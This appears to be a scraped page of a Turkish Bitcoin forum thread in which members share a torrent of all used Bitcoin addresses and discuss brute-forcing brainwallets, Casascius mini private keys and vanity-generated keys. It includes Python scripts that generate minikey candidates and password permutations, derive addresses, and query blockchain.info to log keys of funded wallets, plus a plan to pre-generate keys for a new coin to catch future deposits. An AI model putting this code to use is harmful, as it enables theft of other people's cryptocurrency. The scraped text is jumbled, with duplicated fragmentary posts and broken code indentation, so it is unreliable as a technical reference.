Pages:
Author

Topic: Bitcoin; Algoritma Üzerine Yöntemler - page 14. (Read 33212 times)

legendary
Activity: 1904
Merit: 1282
ben indirebilirsem güzel seed ederim Smiley azıcık uploadlarınızı açın  lütfen

neyse rust kurdum kendim yapayım. böyle ineceği yok. Smiley

enteresan şekilde seedde olduğum halde hala eşler kısmına kimi ipler gelip gidiyor sanırım bana bağlanamıyorlar
member
Activity: 122
Merit: 26
Valla konuyu ben ilgiyle takip ediyorum, her ne kadar yorum yazmasam da.  Bu tip teknik konuların forumda çoğalması oldukça iyi olur. çünkü ülkemizde bu işin teknik kısmıyla ilgilenen pek insan yok. Zaten bu konularla ilgilenenler cüzdanları patlatmak için ilgilenmiyorlar bir çoğu, meraktan ilgileniyorlar, ki bu tip denemeler, beyaz hacker lık gibi bitcoini güçlenidirici niteliklte olur. eğer bir güvenlik açığı olursa bitcoin kendini günceller

Aynen katılıyorum yazdıklarına... Şu anda biz farkında olarak yada olmayarak çok önemli bir kaynak oluşturduk araştırdığım kadarıyla bu şekilde konuyu her yönüyle ele alan ne ingilizce ne de başka bir dilde herhangi bir inceleme yok...

bura da daha geliştirici olması için konuyu takip eden arkadaşların kullandıkları veya yazdıkları yazılımları paylaşması anlatması bizi  daha ilerletecektir ki ben kullandığım tüm yöntemleri kullandığım yazılımlarla paylaşmaya çalışıyorum.

Bir yılın sonunda artık olayın mantık ve etik kısmını aştığımızı düşünüyorum... Artık olayın tamamıyla teknik kısmındayız...

küçük bir rica
kullanılmış adresleri yükleyecek arkadaşlar 1 le başlayan en çok bakiyeli 10 milyon yada 20 milyon adresi bakiyesiz yüklerseniz çok makbule geçer
jr. member
Activity: 237
Merit: 3

neyse rust kurdum kendim yapayım. böyle ineceği yok. Smiley
jr. member
jr. member
rusty blockparser base58 tipinde adresleri veriyor mu?
legendary
tekrar eden satırları ayıkladım totaldeki boyut 300 gb üzerindeydi. tx leri vs ayıkladım linux komutları sağ olsun işlemleri ciddi anlamda kolaylaştırıyor  valla ben bu adar düşürebildim boyutu
member
Activity: 183
Merit: 35
dün butun gun acıktı enteresan neden indiremediyseniz. siz indirinde ozaman listeden kaldırayım 4 kişi indirdi indirdiği gibi kaçtı gitti. bizim insanımıza cidden birşey paylaştırılmıyor seedde dursa ölecekler...
İnmişSmiley gündüz seed edebilirim. Dosyayı inceleyeyim. Tekrar satırlar falan varsa sıkıştırıp dropbox drive'a falan yüklerim olmadı. talep olursa ayda bir rusty blockparser'ı çalıştırıp paylaşabilirim
legendary
Activity: 2212
Merit: 1112
LLP Programming & Electronics
dün butun gun acıktı enteresan neden indiremediyseniz. siz indirinde ozaman listeden kaldırayım 4 kişi indirdi indirdiği gibi kaçtı gitti. bizim insanımıza cidden birşey paylaştırılmıyor seedde dursa ölecekler...

birçok insanın  internet bağlantı hızı  upload   600-700 Kbit/s  yi geçemiyor. 1mbit bile değil yani.  Torrent client i açık bırakıp seed  olunca bu upload hızı da neredeyse tamamen dar boğaza giriyor.   Herkesin haldır huldur canavar gibi interneti olsa açık bırakan daha çok olur.
legendary

member
gönderdiğim dosyaya pek talep olmadı dostum siz dosyayı indirebildiniz mi? grep ile rahatlıkla adresleri karşılaştırabiliyoruz ancak şimdiye kadar en ufak bir adres benzerliği bile denk gelmedi ancak denemelere devam edeceğiz bakalım
birde vanity gen ile daha hızlı adres üretmenin bir yolu varmıdır?
hala inmedi. %92'de takıldı Smiley
vanitygen'de oclvanitygen'i deneyebilirsiniz. Ancak verilen anahtarı ürettiğinde sadece dosyaya yazıyor. Daha fazla özelliği olan BitCrack'a bakabilirsiniz.
legendary
gönderdiğim dosyaya pek talep olmadı dostum siz dosyayı indirebildiniz mi? grep ile rahatlıkla adresleri karşılaştırabiliyoruz ancak şimdiye kadar en ufak bir adres benzerliği bile denk gelmedi ancak denemelere devam edeceğiz bakalım

birde vanity gen ile daha hızlı adres üretmenin bir yolu varmıdır?
hero member
Activity: 1078
Merit: 696
Valla konuyu ben ilgiyle takip ediyorum, her ne kadar yorum yazmasam da.  Bu tip teknik konuların forumda çoğalması oldukça iyi olur. çünkü ülkemizde bu işin teknik kısmıyla ilgilenen pek insan yok. Zaten bu konularla ilgilenenler cüzdanları patlatmak için ilgilenmiyorlar bir çoğu, meraktan ilgileniyorlar, ki bu tip denemeler, beyaz hacker lık gibi bitcoini güçlenidirici niteliklte olur. eğer bir güvenlik açığı olursa bitcoin kendini günceller
legendary
rusty blockparser abi download eden kaçıyor gündüz açık bırakamıyorum da gece download edersiniz...
member
mini key aslında bir Brainwallet ...
Tarama yapacaklara Smiley
Anladığım S.... (30 Uzunluğu) şeklinde oluşturduğunda base58 tabanında rastgele diğer karakterler ile bir değer üretiliyor. Yani S ile başlayıp sonraki 29 karakteri 58^29 sayarsak (58x58x58x58..) 1378516006777431104836763434029972462511887354953728 anahtar yapar. Diğer bir deyiş ile üretilebilecek sayı uzunluğu 52 Smiley , maksimum üretilecek olan 79 değil. Anahtarları ürettiğinizde çıkma ihtimali %100 Smiley kapladığı yere değinmiyorum. Üretilenler belli.

Şimdiye kadar Kullanılmış bütün adreslerin bir dosyasını oluşturup torrent olarak paylaştım isyen indirebilir.
Dosya için teşekkürler. Hangi program ile dışarı çıkardınız? ve %88'de takıldı. Seed lazım  Grin
member
Şimdiye kadar Kullanılmış bütün adreslerin bir dosyasını oluşturup torrent olarak paylaştım isyen indirebilir.

magnet:?xt=urn:btih:58180afdf94f3609aaac93fe60015ed3400aceaa&dn=rutor.info_Bitcoin+All+Used+Adress+10.05.2019+%282019%29+PC&tr=udp://opentor.org:2710&tr=udp://opentor.org:2710&tr=http://retracker.local/announce

yada

http://rutor.info/torrent/698806

teşekkür
legendary

magnet:?xt=urn:btih:58180afdf94f3609aaac93fe60015ed3400aceaa&dn=rutor.info_Bitcoin+All+Used+Adress+10.05.2019+%282019%29+PC&tr=udp://opentor.org:2710&tr=udp://opentor.org:2710&tr=http://retracker.local/announce

yada

http://rutor.info/torrent/698806
member
mini key aslında bir Brainwallet yani bir şifre bi dönem fiziksel bitcoin lerin populer hale geleceği düşünülerek oluşturulmuş kullanımı kolay olsun diye yaratılmış bir şey bildiğim kadarıyla... 2016 e kadar üretilmiş fiziksel bitcoinlerin %98 nin akıbetinen ne olduğu bilinmiyor yani mini keylerde saklı bekliyor...

http://gobittest.appspot.com/Brainwallet  

burdan dönüşüm yapabilirsiniz... (bu tür dönüşümlerde siteleri kullanmamanızı öneririm)... (çeşitli dönüşümlerin yapılabileceği )

https://casascius.com/btcaddress-alpha.zip

burda 2013 de yazılmış yani minikey lerin popüler olduğu dönemde kullanılan kaynak kodlarıyla paylaşılmış bir yazılım var her türlü dönüşüm için kullanılabilir

SON OLARAK;

https://casascius.uberbills.com/

Bu sitede mini keyler le üretilen fiziksel bitcoinlerin miktarını ve adreslerini görebilirsiniz...

ayrıca http://uberbills.com/ burdada minikey kullanarak fiziksel btc üretmiş bazı sitelerin linkleri var
member
random minikey üreten yazılım ;
minikey'i nasıl kısa ve uzun adrese çevireceğiz? içeri aktarma yapmak şart mı? yada hangi programlar minikey'i otomatik tanıyor? vs.. Smiley

Not olarak ta ben hep bakıyorum. sağlam tayfa kaldı ise devam edelim + 1 iyidir artık pişen pişmiştir bir senede Smiley
member
taramya devam eden arkadaşlara bir önerim var
Bildiğim kadarıyla  2013 2014 yıllarında Bitcoin minikey kullanılarak oluşturulmuş 50000 (0,25 - 0,5 - 1 - 5 -10 BTC) civarı fiziksel bitcoin var ve bunların akıbeti ile ilgili bir bilgi yok...
https://en.bitcoin.it/wiki/Mini_private_key_format  (burda minikey formatı anlatılıyor) S ile başlayan toplamda 30 karakterden oluşan şifreler aslında bunlar...
tarama havuzunu daraltmak istiyen arkadaşlar deneyebilir...

aynı mantıkla hareket edip random veya belirli bir sırayla minikey üretip bakiye kontrolü yapabilir... üretilen minikey ler yukardaki konuda yazdığım kodla tarama işlemi yapabilir...

random minikey üreten yazılım ;

import hashlib
from binascii import hexlify as hx
import random
rand = random.SystemRandom()

B58_ALPHA = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
ta = open("dict.txt", "w")
def sha256(s):
    return hashlib.sha256(s).digest()

def gen_candidate():
    candidate = "S"
    for i in xrange(29):
        candidate = candidate + rand.choice(B58_ALPHA)
    return candidate

def test_candidate(candidate):
    return sha256(candidate + "?")[0] == chr(0)

while True:
    c = gen_candidate()
    if test_candidate(c):
        print (c)
        ta.write(c + "\n")
member
April 30, 2019, 02:26:43 AM
Ben konuyu baştan sonra okuduktan sonra bu işi başka şekilde yapmaya karar verdim. Smiley
Yeni çıkan (yaklaşık 2 ay olmuş) bir coin için oclvanitygen in kodunda değişiklik yapıyorum bir grup arkadaşımla beraber, bitmeye geldi.
Başlangıç itibariyle hedefimiz 6- 7 milyon adresi private keyleri ile birlikte üretip bir veritabanına koymak.
sonra bir otomasyon ile private keylerini zaten bildiğimiz adreslere bir tam düğüm üzerinden döne döne bakiye kontrolü yapacağız.
Bu coin popülerleştikçe elbet birileri bu cüzdan adresini üretecek.
olasılığı düşünecek olursak, biz bir grup yazılım mühendisi adayı mesleki mastürbasyon yapıyoruz sanırım.

Konu takipçilerine bir sorum var son olarak,

mysql in ırzına geçmişsiniz.
postgresql ile uğraşılmış.
peki nosql ile bu iş nasıl olur fikri olan var mı?

daha önce de yazıldığı gibi 6 7 10 milyon hatta milyarlı aralıklar çok dar bir aralık özellikle kullanımı az olan coinlerde yakalanma olasılığı imkansız demiyorum ama çok büyük şans... Kolay gelsin aynı şeyi bitcoin veya ethereum üzerinden yapılırsa daha etkili olacıktır diye düşünüyorum...

"Güncelleme olarak : Hala sayı çok büyük denk gelme ihtimali yok diyen arkadaşlara eth'da yapanlar varmış Smiley Bu Hacker Rastgele Şifre Deneyerek 7 Milyon Dolarlık Ethereum Çaldı! (okuması zor gelenlere kullanılan şifreleri deneyerek yapıyor)"

EĞİTİM AMAÇLI BİLGİDİR   Smiley Smiley Smiley Smiley
Bitcoin için yapılan şey... bir yazılımla  (ABCDEFGHIJKLMNOPRSTUVYZWX0123456789abcdefghijklmnoprstuvyzwx_+\=-* ) karakterler ile üretilebilecek tüm şifreleri üretip bunların bakiyelerini kontrol ediyorsun ilk 4 basamaklı şifrelerin tamamı kontrol edildiğinde 500 e yakın kullanılmış hesap çıkıyor. 5 de 250 civarı bulmuştum.. 6 da 1250 civarı 7 yi ben denemedim ama birileri denemiştir

1- ÜRetilecek şifreler için; (3,3 aralığını değiştirerek örneğin 1,5 yaparsanız 1 ile 5 karakter arası bütün şifreleri yazar kodda bir eksik karakterleri tekrarlayan şifreler üretmiyor onu çözemedim Sad )

import itertools

def sifreolustur2(min_length,max_length,dosya_adi,deger,sayac=0):
    dosya_2 = open(dosya_adi,"w")
    for for1 in range(min_length , max_length+1):
        c = itertools.permutations(str(deger) , for1)
        for for2 in c:
            line2 = "".join(str(ms) for ms in for2)
            dosya_2.write(line2 + "\n")
            sayac += 1

print(" {} adet olusturuldu".format(sayac))
    dosya_2.close()

if __name__ == '__main__':
    sifreolustur2(3,3,"dict.txt","ABCDEFGHIJKLMNOPRSTUVYZWX0123456789abcdefghijklmnoprstuvyzwx_+\=-*")

2. olarak üretilen şifrelerin taranması (ilk yazılımda ürettiğiniz şifreler dict.txt yazılır sonrasında yazılım kontrol eder)

import threading
import os
import time
import hashlib
import requests
import json
from bit import Key
from bit.format import bytes_to_wif
import traceback

def getAddress(phrases):
    keyList = []
    addrList = []
    addrStr1 = ""
    addrStr2 = ""
    try:
        for phrase in phrases:
            sha256hex = hashlib.sha256(phrase.encode("utf-8")).hexdigest()
            key1 = Key.from_hex(sha256hex)
            wif = bytes_to_wif(key1.to_bytes(), compressed=False)
            key2 = Key(wif)
            keyList.append(sha256hex)
            addrList.append(key2.address)
            addrList.append(key1.address)
            if len(addrStr1): addrStr1 = addrStr1 + "|"
            addrStr1 = addrStr1 + key2.address
            if len(addrStr2): addrStr2 = addrStr2 + "|"
            addrStr2 = addrStr2 + key1.address
    except:
        pass
    return [keyList, addrList, addrStr1, addrStr2]

def getBalances(addrStr):
    balances = "security"
    while True:
        if "security" not in balances: break
        secAddr = balances.split("effects address ")
        if len(secAddr) >= 2:
            secAddr = secAddr[1].split(".")[0]
            addrStr = addrStr.replace(secAddr + "|", "")
            addrStr = addrStr.replace("|" + secAddr, "")
        try:
            r = requests.get(url='http://blockchain.info/multiaddr?active=%s' % addrStr, timeout=5)
            balances = r.text
        except:
            return
    try:
        balances = json.loads(balances)
        balances = balances['addresses']
    except:
        print (balances)
    return balances

getCount = 0
fp_dict = open("dict.txt", "r")
fp_found = open("found.txt", "w+")
fp_fund = open("fund.txt", "w+")

def getWallet():
    global getCount
    while True:
        phrases = []
        try:
            for i in range(128):
                readStr = fp_dict.readline().replace("\r","").replace("\n","")
                if not len(readStr): break
                phrases.append(readStr)
        except:
            pass
        if len(phrases) <= 0: break
        addressRet = getAddress(phrases)

try:
            balancesRet = getBalances(addressRet[2])
            for balance in balancesRet:
                getCount = getCount + 1
                if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
                key = ""
                isCompress = 0
                for i in range(0, len(addressRet[1])):
                    if balance['address'] == addressRet[1]:
                        key = addressRet[0][int(i/2)]
                        if i % 2 == 1: isCompress = 1
                        break
                if key == "": continue
                fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
                if balance['final_balance'] > 0:
                    fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
                print (isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])

balancesRet = getBalances(addressRet[3])
            for balance in balancesRet:
                getCount = getCount + 1
                if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
                key = ""
                isCompress = 1
                for i in range(0, len(addressRet[1])):
                    if balance['address'] == addressRet[1]:
                        key = addressRet[0][int(i/2)]
                        if i % 2 == 1: isCompress = 1
                        break
                if key == "": continue
                fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
                if balance['final_balance'] > 0:
                    fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
                print (isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])
            fp_found.flush()
            fp_fund.flush()
        except:
            traceback.print_exc()
            continue
        #clearScreen()
        print (getCount)

def clearScreen():
    os.system('clear')

def main():
    threads = []
    for i in range(6):
        threads.append(threading.Thread(target=getWallet,args=()))
    for t in threads:
        time.sleep(1.0)
        t.start()
    for t in threads:
        t.join()

if __name__ == '__main__':
    main()

Pages:
Jump to: